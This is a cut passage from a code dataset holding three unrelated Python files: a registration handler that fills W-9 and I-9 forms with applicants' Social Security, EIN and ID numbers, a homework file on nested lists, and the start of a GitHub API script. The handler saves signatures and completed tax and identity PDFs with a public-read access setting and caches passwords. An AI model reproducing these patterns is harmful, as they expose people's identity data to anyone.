\"\")\n user_status=self.request.get(\"user_status\")\n\n form_office = None\n user_office=self.request.get(\"user_office\")\n office_locations = OfficeLocation.query(OfficeLocation.parent_identifier != \"n/a\")\n for office_location in office_locations:\n if office_location.identifier == user_office:\n form_office = office_location.name\n else:\n form_office = form_office\n\n user_ss=self.request.get(\"user_ss\")\n\n if user_status == \"business\":\n user_ein=self.request.get(\"user_business_ein\")\n\n ss_val = user_ss.replace(\"-\", \"\")\n ein_val = user_ein.replace(\"-\", \"\")\n\n ss_vals = list(ss_val)\n ein_vals = list(ein_val)\n ss_coords_w9 = Helpers.get_ss_coordinates(\"w9\")\n ss_coords_i9 = Helpers.get_ss_coordinates(\"i9\")\n ein_coords_w9 = Helpers.get_ss_coordinates(\"ein\")\n\n ret_list_ss = []\n cnt_ss = 0\n\n for ss_val_list in ss_vals:\n ss_char_info = {}\n ss_char_info[\"ss_char_val\"] = ss_val_list\n ss_char_info[\"w9_coords\"] = ss_coords_w9[cnt_ss]\n ss_char_info[\"i9_coords\"] = ss_coords_i9[cnt_ss]\n ret_list_ss.append(ss_char_info)\n cnt_ss += 1\n\n ret_list_ein = []\n cnt_ein = 0\n\n for ein_val_list in ein_vals:\n ein_char_info = {}\n ein_char_info[\"ein_char_val\"] = ein_val_list\n ein_char_info[\"ein_coords\"] = ein_coords_w9[cnt_ein]\n ret_list_ein.append(ein_char_info)\n cnt_ein += 1\n\n else:\n\n ss_val = user_ss.replace(\"-\", \"\")\n ss_vals = list(ss_val)\n ss_coords_w9 = Helpers.get_ss_coordinates(\"w9\")\n ss_coords_i9 = Helpers.get_ss_coordinates(\"i9\")\n\n ret_list = []\n cnt = 0\n\n for ss_val_list in ss_vals:\n ss_char_info = {}\n ss_char_info[\"ss_char_val\"] = ss_val_list\n ss_char_info[\"w9_coords\"] = ss_coords_w9[cnt]\n ss_char_info[\"i9_coords\"] = ss_coords_i9[cnt]\n ret_list.append(ss_char_info)\n cnt += 1\n\n w9_i9_font_1 = ImageFont.truetype(\"Times.ttf\", 41)\n w9_font_2 = ImageFont.truetype(\"Times.ttf\", 71)\n\n first_name_image = Image.new(\"RGBA\", (750,60), (255,255,255))\n draw = ImageDraw.Draw(first_name_image)\n draw.text((5, 0), first_name, (0,0,0), font=w9_i9_font_1)\n\n last_name_image = Image.new(\"RGBA\", (750,60), (255,255,255))\n draw = ImageDraw.Draw(last_name_image)\n draw.text((5, 0), last_name, (0,0,0), font=w9_i9_font_1)\n\n full_name_image = Image.new(\"RGBA\", (2060,45), (255,255,255, 0))\n draw = ImageDraw.Draw(full_name_image)\n draw.text((5, 0), full_name, (0,0,0), font=w9_i9_font_1)\n\n address_1_image = Image.new(\"RGBA\", (1300,45), (255,255,255))\n draw = ImageDraw.Draw(address_1_image)\n draw.text((5, 0), address_1, (0,0,0), font=w9_i9_font_1)\n\n address_2_image = Image.new(\"RGBA\", (1300,45), (255,255,255))\n draw = ImageDraw.Draw(address_2_image)\n draw.text((5, 0), address_2, (0,0,0), font=w9_i9_font_1)\n\n address_street_image = Image.new(\"RGBA\", (870,60), (255,255,255))\n draw = ImageDraw.Draw(address_street_image)\n draw.text((5, 0), address_1, (0,0,0), font=w9_i9_font_1)\n\n address_city_image = Image.new(\"RGBA\", (585,60), (255,255,255))\n draw = ImageDraw.Draw(address_city_image)\n draw.text((5, 0), city, (0,0,0), font=w9_i9_font_1)\n\n address_state_image = Image.new(\"RGBA\", (175,60), (255,255,255))\n draw = ImageDraw.Draw(address_state_image)\n draw.text((5, 0), state, (0,0,0), font=w9_i9_font_1)\n\n address_postal_image = Image.new(\"RGBA\", (340,60), (255,255,255))\n draw = ImageDraw.Draw(address_postal_image)\n draw.text((5, 0), postal_code, (0,0,0), font=w9_i9_font_1)\n\n dob_image = Image.new(\"RGBA\", (420,60), (255,255,255))\n draw = ImageDraw.Draw(dob_image)\n draw.text((5, 0), user_dob, (0,0,0), font=w9_i9_font_1)\n\n email_image = Image.new(\"RGBA\", (890,50), (255,255,255))\n draw = ImageDraw.Draw(email_image)\n draw.text((5, 0), email, (0,0,0), font=w9_i9_font_1)\n\n phone_image = Image.new(\"RGBA\", (460,60), (255,255,255))\n draw = ImageDraw.Draw(phone_image)\n draw.text((5, 0), phone, (0,0,0), font=w9_i9_font_1)\n\n date_w9_image = Image.new(\"RGBA\", (500,45), (255,255,255))\n draw = ImageDraw.Draw(date_w9_image)\n draw.text((5, 0), user_date, (0,0,0), font=w9_i9_font_1)\n\n date_i9_image = Image.new(\"RGBA\", (345,60), (255,255,255))\n draw = ImageDraw.Draw(date_i9_image)\n draw.text((5, 0), user_date, (0,0,0), font=w9_i9_font_1)\n\n check_w9_image = Image.new(\"RGBA\", (35,35), (20,20,20))\n draw = ImageDraw.Draw(check_w9_image)\n draw.rectangle((0, 35 ,0, 0), fill=128)\n\n check_i9_image = Image.new(\"RGBA\", (45,45), (20,20,20))\n draw = ImageDraw.Draw(check_i9_image)\n draw.rectangle((0, 45 ,0, 0), fill=128)\n\n passport_text_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(passport_text_image)\n draw.text((5, 0), \"U.S. Passport\", (0, 0, 0), font=w9_i9_font_1)\n\n dl_text_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(dl_text_image)\n draw.text((5, 0), self.request.get(\"dl_state\") + \" Driver's License\", (0, 0, 0), font=w9_i9_font_1)\n\n id_number_image = Image.new(\"RGBA\", (900, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(id_number_image)\n draw.text((5, 0), self.request.get(\"user_identification_number\"), (0, 0, 0), font=w9_i9_font_1)\n\n authority_text = \"\"\n if self.request.get(\"user_identification_type\") == \"passport\":\n authority_text = \"U.S. Department of State\"\n else:\n states_list = [\n {\n \"name\": \"Alabama\",\n \"abbreviation\": \"AL\",\n \"authority\": \"Alabama Dept. of Revenue\"\n },\n {\n \"name\": \"Alaska\",\n \"abbreviation\": \"AK\",\n \"authority\": \"Alaska Div. of Motor Vehicles\"\n },\n {\n \"name\": \"Arizona\",\n \"abbreviation\": \"AZ\",\n \"authority\": \"Dept. of Transportation\"\n },\n {\n \"name\": \"Arkansas\",\n \"abbreviation\": \"AR\",\n \"authority\": \"AR Dept. of Finance & Administration\"\n },\n {\n \"name\": \"California\",\n \"abbreviation\": \"CA\",\n \"authority\": \"Cal. Department of Motor Vehicles\"\n },\n {\n \"name\": \"Colorado\",\n \"abbreviation\": \"CO\",\n \"authority\": \"Colorado Dept. of Revenue\"\n },\n {\n \"name\": \"Connecticut\",\n \"abbreviation\": \"CO\",\n \"authority\": \"Conn. Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"Delaware\",\n \"abbreviation\": \"DE\",\n \"authority\": \"Delaware Div. of Motor Vehicles\"\n },\n {\n \"name\": \"Florida\",\n \"abbreviation\": \"FL\",\n \"authority\": \"Dept. of Highway Safety & Motor Vehicles\"\n },\n {\n \"name\": \"Georgia\",\n \"abbreviation\": \"GA\",\n \"authority\": \"Georgia Dept. of Driver Services\"\n },\n {\n \"name\": \"Hawaii\",\n \"abbreviation\": \"HI\",\n \"authority\": \"Hawaii Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"Idaho\",\n \"abbreviation\": \"ID\",\n \"authority\": \"Idaho Transportation Dept.\"\n },\n {\n \"name\": \"Illinois\",\n \"abbreviation\": \"IL\",\n \"authority\": \"IL Secretary of State\"\n },\n {\n \"name\": \"Indiana\",\n \"abbreviation\": \"IN\",\n \"authority\": \"IN Bureau of Motor Vehicles\"\n },\n {\n \"name\": \"Iowa\",\n \"abbreviation\": \"IA\",\n \"authority\": \"Iowa Dept. of Transportation\"\n },\n {\n \"name\": \"Kansas\",\n \"abbreviation\": \"KS\",\n \"authority\": \"Kansas Dept. of Revenue\"\n },\n {\n \"name\": \"Kentucky\",\n \"abbreviation\": \"KY\",\n \"authority\": \"KY Transportation Cabinet\"\n },\n {\n \"name\": \"Lousiana\",\n \"abbreviation\": \"LA\",\n \"authority\": \"LA Office of Motor Vehicles\"\n },\n {\n \"name\": \"Maine\",\n \"abbreviation\": \"ME\",\n \"authority\": \"Maine Bureau of Motor Vehicles\"\n },\n {\n \"name\": \"Maryland\",\n \"abbreviation\": \"MD\",\n \"authority\": \"Maryland Motor Vehicles Admin.\"\n },\n {\n \"name\": \"Massachusetts\",\n \"abbreviation\": \"MA\",\n \"authority\": \"Registry of Motor Vehicles\"\n },\n {\n \"name\": \"Michigan\",\n \"abbreviation\": \"MI\",\n \"authority\": \"MI Secretary of State\"\n },\n {\n \"name\": \"Minnestoa\",\n \"abbreviation\": \"MN\",\n \"authority\": \"MN. Dept. of Public Safety\"\n },\n {\n \"name\": \"Mississippi\",\n \"abbreviation\": \"MS\",\n \"authority\": \"MS Dept. of Public Safety\"\n },\n {\n \"name\": \"Missouri\",\n \"abbreviation\": \"MO\",\n \"authority\": \"MO Dept. of Revenue\"\n },\n {\n \"name\": \"Montana\",\n \"abbreviation\": \"MT\",\n \"authority\": \"MT Dept. of Justice\"\n },\n {\n \"name\": \"Nebraska\",\n \"abbreviation\": \"NE\",\n \"authority\": \"NE Dept of Motor Vehicles\"\n },\n {\n \"name\": \"Nevada\",\n \"abbreviation\": \"NV\",\n \"authority\": \"NV Department of Motor Vehicles\"\n },\n {\n \"name\": \"New Hampshire\",\n \"abbreviation\": \"NH\",\n \"authority\": \"NH Dept. of Safety\"\n },\n {\n \"name\": \"New Jersey\",\n \"abbreviation\": \"NJ\",\n \"authority\": \"NJ Motor Vehicle Commission\",\n },\n {\n \"name\": \"New Mexico\",\n \"abbreviation\": \"NM\",\n \"authority\": \"NM Motor Vehicles Division\"\n },\n {\n \"name\": \"New York\",\n \"abbreviation\": \"NY\",\n \"authority\": \"NY Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"North Carolina\",\n \"abbreviation\": \"NC\",\n \"authority\": \"NC Dept. of Transportation\"\n },\n {\n \"name\": \"North Dakota\",\n \"abbreviation\": \"ND\",\n \"authority\": \"ND Dept. of Transportation\"\n },\n {\n \"name\": \"Ohio\",\n \"abbreviation\": \"OH\",\n \"authority\": \"OH Bureau of Motor Vehicles\"\n },\n {\n \"name\": \"Oklahoma\",\n \"abbreviation\": \"OK\",\n \"authority\": \"OK Dept. of Public Safety\"\n },\n {\n \"name\": \"Oregon\",\n \"abbreviation\": \"OR\",\n \"authority\": \"OR Dept. of Transportation\"\n },\n {\n \"name\": \"Pennsylvania\",\n \"abbreviation\": \"PA\",\n \"authority\": \"PA Dept. of Transportation\"\n },\n {\n \"name\": \"Rhode Island\",\n \"abbreviation\": \"RI\",\n \"authority\": \"Rhode Island Dept. of Revenue\"\n },\n {\n \"name\": \"South Carolina\",\n \"abbreviation\": \"SC\",\n \"authority\": \"SC Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"South Dakota\",\n \"abbreviation\": \"SD\",\n \"authority\": \"South Dak. Dept. of Public Safety\"\n },\n {\n \"name\": \"Tennessee\",\n \"abbreviation\": \"TN\",\n \"authority\": \"Dept. of Safety & Homeland Security\"\n },\n {\n \"name\": \"Texas\",\n \"abbreviation\": \"TX\",\n \"authority\": \"TX Dept. of Public Safety\"\n },\n {\n \"name\": \"Utah\",\n \"abbreviation\": \"UT\",\n \"authority\": \"Utah Dept. of Public Safety\"\n },\n {\n \"name\": \"Vermont\",\n \"abbreviation\": \"VT\",\n \"authority\": \"VT Agency of Transportation\"\n },\n {\n \"name\": \"Virginia\",\n \"abbreviation\": \"VA\",\n \"authority\": \"VA Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"Washington\",\n \"abbreviation\": \"WA\",\n \"authority\": \"WA Dept. of Licensing\"\n },\n {\n \"name\": \"West Virginia\",\n \"abbreviation\": \"WV\",\n \"authority\": \"WV Dept. of Transportation\"\n },\n {\n \"name\": \"Wisconsin\",\n \"abbreviation\": \"WI\",\n \"authority\": \"WI Dept. of Transportation\"\n },\n {\n \"name\": \"Wyoming\",\n \"abbreviation\": \"WY\",\n \"authority\": \"WY Dept. of Transportation\"\n }\n ]\n\n for stayyyte in states_list:\n if stayyyte[\"abbreviation\"] == self.request.get(\"dl_state\").upper():\n authority_text = stayyyte[\"authority\"]\n\n id_authority_image = Image.new(\"RGBA\", (900, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(id_authority_image)\n draw.text((5, 0), authority_text, (0, 0, 0), font=w9_i9_font_1)\n\n expiration_date_image = Image.new(\"RGBA\", (420, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(expiration_date_image)\n draw.text((5, 0), self.request.get(\"identification_expiration\").replace(\"-\", \"/\"), (0, 0, 0), font=w9_i9_font_1)\n\n ss_title_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(ss_title_image)\n draw.text((5, 0), \"Social Security Card\", (0, 0, 0), font=w9_i9_font_1)\n\n ss_num_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(ss_num_image)\n draw.text((5, 0), user_ss, (0, 0, 0), font=w9_i9_font_1)\n\n ss_authority_image = Image.new(\"RGBA\", (900, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(ss_authority_image)\n draw.text((5, 0), \"Social Security Administration\", (0, 0, 0), font=w9_i9_font_1)\n\n working_state = self.request.get(\"user_primary_state\")\n\n img_files = Helpers.get_documentation_images(user_type, working_state, [\"agreement_signature\", \"before_signature_images\", \"after_signature_images\"])\n\n w9_bytes = BytesIO(img_files[\"w9\"].read())\n w9_image = Image.open(w9_bytes)\n img_files[\"w9\"].close()\n\n #commenttttt\n #k\n\n i9_bytes = BytesIO(img_files[\"i9\"].read())\n i9_image = Image.open(i9_bytes)\n img_files[\"i9\"].close()\n\n i9_2_bytes = BytesIO(img_files[\"i9_2\"].read())\n i9_image2 = Image.open(i9_2_bytes)\n img_files[\"i9_2\"].close()\n\n #agreement_intro_image = Image.open(BytesIO(img_files[\"before_signature_images\"][0].read()))\n #img_files[\"before_signature_images\"][0].close()\n #agreement_sig_page_image = Image.open(BytesIO(img_files[\"agreement_signature\"].read()))\n #img_files[\"agreement_signature\"].close()\n\n bucket_name = os.environ.get('BUCKET_NAME', app_identity.get_default_gcs_bucket_name())\n bucket = '/' + bucket_name\n\n write_retry_params = gcs.RetryParams(backoff_factor=1.1)\n\n filename = bucket + '/TempDocs/' + new_user.identifier + \"_sig.txt\"\n gcs_file = gcs.open(\n filename,\n 'w',\n content_type=\"text/plain\",\n options={'x-goog-meta-foo': 'foo',\n 'x-goog-meta-bar': 'bar',\n 'x-goog-acl': 'public-read'},\n retry_params=write_retry_params\n )\n\n gcs_file.write(str(user_sig))\n gcs_file.close()\n\n bytes_stream = BytesIO(base64.b64decode(user_sig))\n user_sig_image = Image.open(bytes_stream)\n user_sig_image.thumbnail((656,214), Image.ANTIALIAS)\n\n w9_image.paste(full_name_image, (190, 310), full_name_image)\n w9_image.paste(address_1_image, (190, 860), address_1_image)\n w9_image.paste(address_2_image, (190, 970), address_2_image)\n w9_image.paste(date_w9_image, (1770, 2300), date_w9_image)\n w9_image.paste(user_sig_image, (475, 2185), user_sig_image)\n\n if user_status == \"business\":\n user_business=self.request.get(\"user_business\")\n\n user_business_image = Image.new(\"RGBA\", (2060,45), (255,255,255))\n draw = ImageDraw.Draw(user_business_image)\n draw.text((5, 0), user_business, (0,0,0), font=w9_i9_font_1)\n w9_image.paste(user_business_image, (190,420), user_business_image)\n\n for item in ret_list_ein:\n ein_w9_val = item[\"ein_char_val\"]\n w9_ein_image = Image.new(\"RGBA\", (50,85), (255,255,255,0))\n draw = ImageDraw.Draw(w9_ein_image)\n draw.text((5, 0), ein_w9_val, (0,0,0), font=w9_font_2)\n w9_image.paste(w9_ein_image, (item[\"ein_coords\"][\"x\"], item[\"ein_coords\"][\"y\"]), w9_ein_image)\n\n user_business_type=self.request.get(\"user_business_type\")\n\n if user_business_type == \"sole\":\n w9_image.paste(check_w9_image, (166, 550), check_w9_image)\n elif user_business_type == \"ccorp\":\n w9_image.paste(check_w9_image, (724, 550), check_w9_image)\n elif user_business_type == \"scorp\":\n w9_image.paste(check_w9_image, (1055, 550), check_w9_image)\n elif user_business_type == \"partner\":\n w9_image.paste(check_w9_image, (1353, 550), check_w9_image)\n elif user_business_type == \"trust\":\n w9_image.paste(check_w9_image, (1682, 550), check_w9_image)\n elif user_business_type == \"llc\":\n w9_image.paste(check_w9_image, (166, 630), check_w9_image)\n\n user_tax_class = self.request.get(\"user_business_tax\")[0].upper()\n\n tax_class_image = Image.new(\"RGBA\", (145,45), (255,255,255))\n draw = ImageDraw.Draw(tax_class_image)\n draw.text((25, 0), user_tax_class, (0,0,0), font=w9_i9_font_1)\n w9_image.paste(tax_class_image, (1755,625), tax_class_image)\n\n else:\n w9_image.paste(check_w9_image, (166, 550), check_w9_image)\n\n for item in ret_list:\n ss_w9_val = item[\"ss_char_val\"]\n w9_ss_image = Image.new(\"RGBA\", (50,85), (255,255,255,0))\n draw = ImageDraw.Draw(w9_ss_image)\n draw.text((5, 0), ss_w9_val, (0,0,0), font=w9_font_2)\n w9_image.paste(w9_ss_image, (item[\"w9_coords\"][\"x\"], item[\"w9_coords\"][\"y\"]), w9_ss_image)\n\n\n i9_image.paste(last_name_image, (65, 700), last_name_image)\n i9_image.paste(first_name_image, (820, 700), first_name_image)\n i9_image.paste(address_street_image, (65, 830), address_street_image)\n i9_image.paste(address_city_image, (1230, 830), address_city_image)\n i9_image.paste(address_state_image, (1845, 830), address_state_image)\n i9_image.paste(address_postal_image, (2045, 830), address_postal_image)\n i9_image.paste(dob_image, (65, 960), dob_image)\n i9_image.paste(email_image, (995, 980), email_image)\n i9_image.paste(phone_image, (1920, 960), phone_image)\n i9_image.paste(check_i9_image, (45, 1260), check_i9_image)\n i9_image.paste(user_sig_image, (445, 2230), user_sig_image)\n i9_image.paste(date_i9_image, (2025, 2314), date_i9_image)\n\n if self.request.get(\"user_identification_type\") == \"passport\":\n i9_image2.paste(passport_text_image, (180, 685), passport_text_image)\n i9_image2.paste(id_authority_image, (180, 775), id_authority_image)\n i9_image2.paste(id_number_image, (180, 865), id_number_image)\n i9_image2.paste(expiration_date_image, (180, 955), expiration_date_image)\n else:\n i9_image2.paste(dl_text_image, (930, 685), dl_text_image)\n i9_image2.paste(id_authority_image, (930, 775), id_authority_image)\n i9_image2.paste(id_number_image, (930, 865), id_number_image)\n i9_image2.paste(expiration_date_image, (930, 955), expiration_date_image)\n\n i9_image2.paste(ss_title_image, (1690, 685), ss_title_image)\n i9_image2.paste(ss_authority_image, (1690, 775), ss_authority_image)\n i9_image2.paste(ss_num_image, (1690, 865), ss_num_image)\n\n\n\n if user_status == \"business\":\n for item in ret_list_ss:\n ss_i9_val = item[\"ss_char_val\"]\n i9_ss_image = Image.new(\"RGBA\", (40,60), (255,255,255,0))\n draw = ImageDraw.Draw(i9_ss_image)\n draw.text((5, 0), ss_i9_val, (0,0,0), font=w9_i9_font_1)\n i9_image.paste(i9_ss_image, (item[\"i9_coords\"][\"x\"], item[\"i9_coords\"][\"y\"]), i9_ss_image)\n\n else:\n for item in ret_list:\n ss_i9_val = item[\"ss_char_val\"]\n i9_ss_image = Image.new(\"RGBA\", (40,60), (255,255,255,0))\n draw = ImageDraw.Draw(i9_ss_image)\n draw.text((5, 0), ss_i9_val, (0,0,0), font=w9_i9_font_1)\n i9_image.paste(i9_ss_image, (item[\"i9_coords\"][\"x\"], item[\"i9_coords\"][\"y\"]), i9_ss_image)\n\n #agreement_intro_image.paste(today_image, (700, 506), today_image)\n #agreement_intro_image.paste(full_name_image, (1060, 562), full_name_image)\n\n\n #recruiters = FieldApplicationUser.query(FieldApplicationUser.rep_id == recruiter_rep_id)\n #for recruiter in recruiters:\n #recruiter_name_image = Image.new(\"RGBA\", (900,60), (255,255,255))\n #draw = ImageDraw.Draw(recruiter_name_image)\n #draw.text((5, 0), recruiter.first_name + \" \" + recruiter.last_name, (0,0,0), font=w9_i9_font_1)\n\n #agreement_sig_page_image.paste(recruiter_name_image, (1605, 2206), recruiter_name_image)\n\n\n #agreement_sig_page_image.paste(full_name_image, (1605, 2005), full_name_image)\n #agreement_sig_page_image.paste(user_sig_image, (1500, 1775), user_sig_image)\n\n\n buff = StringIO.StringIO()\n w9_image.save(buff, \"PDF\", resolution=100.0, quality=30.0)\n buff.seek(2)\n w9_pdf=PdfFileReader(buff, False)\n\n buff = StringIO.StringIO()\n i9_image.save(buff, \"PDF\", resolution=100.0, quality=30.0)\n buff.seek(2)\n i9_pdf=PdfFileReader(buff, False)\n\n buff = StringIO.StringIO()\n i9_image2.save(buff, \"PDF\", resolution=100.0, quality=30.0)\n buff.seek(2)\n i9_pdf2 = PdfFileReader(buff, False)\n\n #before_sig_pdfs = []\n #for img in img_files[\"before_signature_images\"]:\n #Image.open(BytesIO(img.read())).save(buff, \"PDF\", resolution=100.0)\n #buff.seek(0)\n #before_sig_pdfs.append(PdfFileReader(buff, False))\n #img.close()\n\n #buff.seek(0)\n\n #agreement_intro_image.save(buff, \"PDF\", resolution=100.0)\n #buff.seek(2)\n #agreement_intro_pdf = PdfFileReader(buff, False)\n\n #agreement_sig_page_image.save(buff, \"PDF\", resolution=100.0)\n #buff.seek(2)\n #agreement_sig_page_pdf = PdfFileReader(buff, False)\n\n #after_sig_pdfs = []\n #for img in img_files[\"after_signature_images\"]:\n # Image.open(BytesIO(img.read())).save(buff, \"PDF\", resolution=100.0)\n # buff.seek(0)\n # after_sig_pdfs.append(PdfFileReader(buff, False))\n # img.close()\n\n #buff.seek(2)\n\n output_docs=PdfFileWriter()\n output_docs.addPage(w9_pdf.getPage(0))\n output_docs.addPage(i9_pdf.getPage(0))\n output_docs.addPage(i9_pdf2.getPage(0))\n\n #for before_sig_pdf in before_sig_pdfs:\n #output_docs.addPage(before_sig_pdf.getPage(0))\n\n #output_docs.addPage(agreement_intro_pdf.getPage(0))\n #output_docs.addPage(agreement_sig_page_pdf.getPage(0))\n\n #for after_sig_pdf in after_sig_pdfs:\n #output_docs.addPage(after_sig_pdf.getPage(0))\n\n buff = StringIO.StringIO()\n buff.seek(2)\n output_docs.write(buff)\n #buff.seek(0)\n\n filename = bucket + '/TempDocs/' + new_user.identifier + \"_1.pdf\"\n gcs_file = gcs.open(\n filename,\n 'w',\n content_type=\"application/pdf\",\n options={'x-goog-meta-foo': 'foo',\n 'x-goog-meta-bar': 'bar',\n 'x-goog-acl': 'public-read'},\n retry_params=write_retry_params\n )\n\n gcs_file.write(buff.getvalue())\n gcs_file.close()\n\n memcache.set(key=\"allow_registration_for_\" + new_user.identifier, value=\"1\", time=60 * 10)\n new_user_dict = {}\n new_user_dict[\"identifier\"] = new_user.identifier\n\n new_user_dict[\"first_name\"] = new_user.first_name\n new_user_dict[\"last_name\"] = new_user.last_name\n new_user_dict[\"main_office\"] = new_user.main_office\n new_user_dict[\"rep_id\"] = user_rep_id\n new_user_dict[\"rep_email\"] = new_user.rep_email\n new_user_dict[\"rep_phone\"] = new_user.rep_phone\n new_user_dict[\"user_type\"] = new_user.user_type\n new_user_dict[\"password\"] = new_user.password\n new_user_dict[\"payscale_key\"] = new_user.payscale_key\n new_user_dict[\"sales_rabbit_id\"] = new_user.sales_rabbit_id\n new_user_dict[\"current_status\"] = new_user.current_status\n new_user_dict[\"recruiter_rep_id\"] = new_user.recruiter_rep_id\n new_user_dict[\"allowed_offices\"] = new_user.allowed_offices\n new_user_dict[\"automatic_override_designee\"] = new_user.automatic_override_designee\n new_user_dict[\"automatic_override_enabled\"] = new_user.automatic_override_enabled\n new_user_dict[\"automatic_override_amount\"] = new_user.automatic_override_amount\n\n memcache.set(key=\"temp_pending_user_registration_\" + new_user.identifier, value=new_user_dict, time=60 * 10)\n memcache.set(key=\"user_registration_state_for_\" + new_user.identifier, value=working_state, time=60 * 10)\n memcache.set(key=\"user_registration_city_for_\" + new_user.identifier, value=city, time=60 * 10)\n\n w9_bytes.close()\n i9_bytes.close()\n i9_2_bytes.close()\n bytes_stream.close()\n buff.close()\n\n self.redirect(\"continue_registration/1/\" + new_user.identifier)\n return\n\n name = new_user.first_name + \" \" + new_user.last_name\n template_vars = {}\n template_vars[\"name\"] = name\n\n Helpers.send_html_email(new_user.rep_email, \"Your Application to New Power\", \"user_signs_up\", template_vars)\n\n\n attachment_data = {}\n attachment_data[\"content_types\"] = [\"application/pdf\"]\n attachment_data[\"filenames\"] = [\"W9_I9_\" + name.replace(\" \", \"_\") + \".pdf\"]\n attachment_data[\"data\"] = [base64.b64encode(buff.getvalue())]\n\n buff.close()\n\n notification_msg1 = \"Dear Administrator,\\n\\nA new user (\" + name + \") has requested access to register with the in-house npfieldapp.appspot.com app. If you would like to approve \" + name + \", please visit the following link (must be signed-in):\\n\\n\"\n notification_msg1 += \"https://\" + self.request.environ[\"SERVER_NAME\"] + \"/approve_user/\" + new_user.identifier\n\n notification_entries = Notification.query(\n ndb.OR\n (\n Notification.action_name == \"User Registers for App (Email)\",\n Notification.action_name == \"User Register for App (SMS)\",\n )\n )\n for notification_entry in notification_entries:\n for item in notification_entry.notification_list:\n if notification_entry.action_name == \"User Registers for App (Email)\":\n Helpers.send_email(item.email_address, \"Approve Access for \" + name, notification_msg1, attachment_data)\n elif notification_entry.action_name == \"user Registers for App (SMS)\":\n Helpers.send_email(item.email_address, \"Found talent!\", \"Talent acquired: \" + name.lower() + \" from \" + city.lower() + \", \" + state.lower() + \"...\" + str(form_office))\n else:\n logging.info(\"Unkown action name\")\n\n new_user.put()\n self.redirect(\"/?just_registered=true\")\n\n","sub_path":"classes/RegistrationHandler_/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":39283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382471689","text":"'''\nAndrew Lucero\nCS 1134 HW 4\nProfessor John Iacono\n\nThis assignment featured a number of exercises.\n'''\n\n'''Question 1) \nSuppose I wrote the following code: \n\nA = [ [1, 2] , [3, [[[4], 5]], 6] , 7, 8]\nprint(6 in A)\n\nIt would return False.\n\nWrite a function inSomewhere(X, s) that will \nreturn true if x is somewhere in x, and x is an arbitrarily \nnested list of lists. \n\n\n\n'''\n\ndef in_somewhere(seek, lst):\n for x in lst:\n if x == seek:\n return True\n if isinstance(x, list):\n if in_somewhere(seek, x):\n return True\n return False\n\n'''\nQuestion 2)\nWrite a function unnest that works as follows: \n\nA=[[1,2],[3,[[[4],5]],6],7,8]\nprint(unnest(A))\nprint(A)\n\noutput: \n[1, 2, 3, 4, 5, 6, 7, 8]\n[[1, 2], [3, [[[4], 5]], 6], 7, 8]\n'''\n\n\ndef unnest(lst):\n unnested_lst = []\n for x in lst:\n if isinstance(x, list):\n unnested_lst += unnest(x)\n else:\n unnested_lst.append(x)\n return unnested_lst\n\n'''\nQuestion 3) \nWrite a function that takes a 2d list, and prints it in an \naesthetically pleasing manner. \n\n'''\n\n\ndef print2d(lst):\n print(\"[\")\n for x in lst:\n print(\" \", x)\n print(\"]\")\n\n'''\nQuestion 4) \nWrite a function triangle(n) that functions as follows:\n \nprint2d(triangle(5))\n\noutput: \n[ \n [5]\n [5, 4]\n [5, 4, 3]\n [5, 4, 3, 2]\n [5, 4, 3, 2, 1]\n]\n'''\n\n\ndef triangle(n):\n app = n\n tri_list = [[] for i in range(n)]\n for x in range(n):\n for y in range(app):\n tri_list[y].append(app)\n app -= 1\n tri_list.reverse()\n return tri_list\n\n\n'''\nQuestion 5)\nWrite a function table that takes the form: \n table(f, xrange, yrange)\nIt should take in a function and 2 ranges as the parameter, \nand return a table that contains the result of running the \nfunction on the row/column values. \n\n'''\n\n\ndef table(f, xrange, yrange):\n return_table = []\n for x in yrange:\n return_table.append([f(i,x) for i in xrange])\n return return_table\n\n\n'''\nQuestion 6) \nWrite a nest function that takes functions as follows: \nprint(nest(\"dog\"), 3)\n\noutput: \n[[[\"dog\"]]]\n\n'''\n\n\ndef nest(nestee, n):\n nested_list = []\n if n > 1:\n nested_list.append(nest(nestee, n - 1))\n else:\n return [nestee]\n return nested_list\n\n\ndef main():\n A = [[1, 2], [3, [[[4], 5]], 6], 7, 8]\n print(in_somewhere(6, A))\n print(unnest(A))\n print2d([[i] * 5 for i in range(5)])\n print2d(triangle(5))\n print2d(table(pow, [1, 2, 10], range(10, 15)))\n print(nest(\"dog\", 3))\n\nmain()","sub_path":"CS1134_HW4.py","file_name":"CS1134_HW4.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78485213","text":"#!/usr/bin/env python3\nimport github3\nimport sys\nsys.path.append('./lib')\nfrom github3 import GitHubEnterprise\nfrom getpass import getpass, getuser\nimport re\nfrom wordcloud import WordCloud\nfrom os import path\nfrom GHLogin import Login\nfrom textblob import TextBlob\n\nghe = False\nuser = input(\"Please enter your username\\n>\")\ntoken = getpass(\"please enter your P.A.T. for authentication\\n>\")\nreqs_max = 5000\norg_search = False\nuser_search = False\npub_search = True\n\nif ghe:\n\tlogin = Login(user, token)\n\tgh = login.authenticate_ghe()\nelse:\n\tlogin = Login(user, token)\n\tgh = login.authenticate()\n\ndef get_org():\n\tfor orgs in gh.iter_orgs():\n\t\t#Specify an org at a time. You'll need to query the API to get the org ID\n\t\torg = [orgs for orgs in gh.iter_orgs() if orgs.id == 9919]\n\treturn org\n\ndef get_repos():\n\tif org_search:\n\t\tfor orgs in get_org():\n\t\t\t#Specify one repository at a time. You'll need to query the API to get the ID of the repoistory\n\t\t\trepos = [repos for repos in orgs.iter_repos() if repos.id == 24772020]\n\t\treturn repos\n\telif 